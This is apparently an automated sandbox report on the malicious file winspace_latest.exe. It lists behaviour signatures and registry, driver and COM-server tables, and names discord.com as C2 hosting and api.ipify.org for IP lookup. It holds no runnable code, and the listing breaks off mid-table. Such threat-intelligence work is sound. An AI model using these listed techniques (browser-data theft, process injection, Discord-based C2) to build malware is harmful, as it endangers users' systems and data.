Analysis Overview
SHA256
d21818fd57079745bbf23df611070c6a4fee748d6cc7d8ab4db509689b604594
Threat Level: Known bad
The file winspace_latest.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies Installed Components in the registry
Downloads MZ/PE file
Drops file in Drivers directory
Sets file execution options in registry
Sets service image path in registry
Modifies RDP port number used by Windows
Reads user/profile data of web browsers
Checks BIOS information in registry
Loads dropped DLL
Registers COM server for autorun
Executes dropped EXE
Checks computer location settings
Looks up external IP address via web service
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Checks system information in the registry
Drops file in System32 directory
Drops file in Program Files directory
Drops file in Windows directory
Unsigned PE
Detects Pyinstaller
Enumerates physical storage devices
Script User-Agent
Modifies Internet Explorer settings
Uses Volume Shadow Copy WMI provider
Views/modifies file attributes
Checks SCSI registry key(s)
Modifies data under HKEY_USERS
Suspicious use of SendNotifyMessage
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies system certificate store
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Checks processor information in registry
Modifies registry class
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-04 16:34
Signatures
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-04 16:33
Reported
2024-06-04 16:48
Platform
win10v2004-20240426-en
Max time kernel
411s
Max time network
548s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2320 created 3156 | N/A | C:\Users\Admin\Downloads\MBSetup.exe | C:\Windows\Explorer.EXE |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\DRIVERS\mbamswissarmy.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\MbamChameleon.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\SysWOW64\drivers\mbamtestfile.dat | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| File created | C:\Windows\system32\drivers\mbae64.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Windows\system32\DRIVERS\MbamElam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\DRIVERS\MbamElam.sys | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B} | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\ = "Brave" | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\StubPath = "\"C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\125.1.66.118\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level" | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\Localized Name = "Brave" | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\IsInstalled = "1" | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}\Version = "43,0,0,0" | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
Modifies RDP port number used by Windows
Sets file execution options in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BraveUpdate.exe | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BraveUpdate.exe\DisableExceptionChainValidation = "0" | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mbamchameleon\ImagePath = "\\SystemRoot\\System32\\Drivers\\MbamChameleon.sys" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MBAMSwissArmy\ImagePath = "\\SystemRoot\\System32\\Drivers\\mbamswissarmy.sys" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\Malwarebytes\Anti-Malware\Malwarebytes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{06C9646D-2807-44C0-97D2-6DA0DB623DB4}\LocalServer32 | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51F87104-87CE-44E6-B700-998AEB9FE260}\InProcServer32 | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EBDA5D88-AA7D-4A8C-A20C-C01FADB43EDA}\InprocServer32\ = "C:\\Program Files (x86)\\BraveSoftware\\Update\\1.3.361.149\\psmachine_64.dll" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EBDA5D88-AA7D-4A8C-A20C-C01FADB43EDA}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51F87104-87CE-44E6-B700-998AEB9FE260}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC03C0E4-1528-4299-89B2-419644FA48AC}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EBDA5D88-AA7D-4A8C-A20C-C01FADB43EDA}\InprocServer32\ = "C:\\Program Files (x86)\\BraveSoftware\\Update\\1.3.361.149\\psmachine_64.dll" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{06C9646D-2807-44C0-97D2-6DA0DB623DB4}\LocalServer32\ = "\"C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\125.1.66.118\\notification_helper.exe\"" | C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05098CD5-9914-48C2-A453-DB782F55A65F}\InProcServer32\ = "C:\\PROGRAM FILES\\MALWAREBYTES\\ANTI-MALWARE\\mbamsi64.dll" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EBDA5D88-AA7D-4A8C-A20C-C01FADB43EDA}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EBDA5D88-AA7D-4A8C-A20C-C01FADB43EDA}\InprocServer32 | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F36AD0D0-B5F0-4C69-AF08-603D177FEF0E}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{8F1C46F8-E697-4175-B240-CDE682A4BA2D}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EBDA5D88-AA7D-4A8C-A20C-C01FADB43EDA}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EE8A9269-9E6E-4683-BCD3-41E9B16696DC}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EBDA5D88-AA7D-4A8C-A20C-C01FADB43EDA}\InprocServer32 | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51F87104-87CE-44E6-B700-998AEB9FE260}\InProcServer32 | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC03C0E4-1528-4299-89B2-419644FA48AC}\InprocServer32\ = "C:\\Program Files (x86)\\BraveSoftware\\Update\\1.3.361.149\\psmachine_64.dll" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9D372F21-E6DA-4B82-881A-79F6CA6B6AE1}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{05098CD5-9914-48C2-A453-DB782F55A65F}\InProcServer32\ThreadingModel = "Both" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EBDA5D88-AA7D-4A8C-A20C-C01FADB43EDA}\InprocServer32 | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1AC7139-D1FF-4DE9-84A4-92E2B47F5D2A}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC03C0E4-1528-4299-89B2-419644FA48AC}\InprocServer32 | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F6D29500-933C-447C-9D88-9D814AF73808}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51F87104-87CE-44E6-B700-998AEB9FE260}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51F87104-87CE-44E6-B700-998AEB9FE260}\InProcServer32\ = "C:\\Program Files (x86)\\BraveSoftware\\Update\\1.3.361.149\\psmachine_64.dll" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC03C0E4-1528-4299-89B2-419644FA48AC}\InprocServer32 | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC03C0E4-1528-4299-89B2-419644FA48AC}\InprocServer32\ = "C:\\Program Files (x86)\\BraveSoftware\\Update\\1.3.361.149\\psmachine_64.dll" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{36A65E46-6CC1-4CA2-B51E-F4DD8C993DDC}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BC03C0E4-1528-4299-89B2-419644FA48AC}\InprocServer32\ThreadingModel = "Both" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{51F87104-87CE-44E6-B700-998AEB9FE260}\InProcServer32\ThreadingModel = "Both" | C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe | N/A |
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Checks system information in the registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
